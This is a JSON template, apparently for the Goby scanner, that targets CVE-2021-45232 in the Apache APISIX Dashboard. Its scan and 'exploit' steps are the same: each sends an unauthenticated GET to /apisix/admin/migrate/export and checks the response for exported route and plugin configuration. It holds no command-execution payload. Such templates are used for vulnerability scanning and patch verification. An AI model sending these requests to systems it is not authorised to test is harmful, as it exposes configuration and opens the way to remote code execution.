Goby/json/Apache_APISIX_Dashboard_RCE...

113 lines
4.3 KiB
JSON
Raw Normal View History

2022-11-25 02:08:58 -08:00
{
"Name": "Apache APISIX Dashboard RCE CVE-2021-45232",
"Level": "3",
"Tags": [
"rce"
],
"GobyQuery": "title==\"Apache APISIX Dashboard\"",
"Description": "Apache APISIX Dashboard migrate接口存在未授权访问漏洞可下载路由配置文件以及上传配置文件导致存在命令执行。",
"Product": "Apache APISIX Dashboard",
"Homepage": "https://apisix.apache.org/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247487772&idx=2&sn=09b6c93b14f10f4cb41aecc94ce71c75"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/apisix/admin/migrate/export",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Consumers\":[],\"Routes\":",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "PluginConfigs\":",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/apisix/admin/migrate/export",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Consumers\":[],\"Routes\":",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "PluginConfigs\":",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-12-30 17:02:19",
"GobyVersion": "1.9.320"
}